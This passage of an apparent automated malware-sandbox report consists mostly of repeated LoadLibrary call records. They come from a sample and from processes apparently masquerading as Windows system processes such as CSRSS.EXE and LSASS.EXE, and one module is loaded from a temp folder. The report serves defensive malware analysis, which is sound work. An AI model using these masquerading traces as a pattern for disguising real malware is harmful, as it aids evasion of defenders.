\"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759a0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 726a0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74900000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005900)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005744)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005968)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005968)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005968)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005968)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005968)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005832)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter MSVBVM60.DLL (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005796)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005796)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006092)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006100)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005948)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004192)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006136)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006136)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003924)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003760)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003760)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003760)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003760)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004100)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003484)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003484)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004144)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004144)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004144)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004144)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004144)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004144)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003956)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003956)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003956)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003956)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003956)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003956)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003400)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003400)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003688)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003688)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003604)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004088)\n 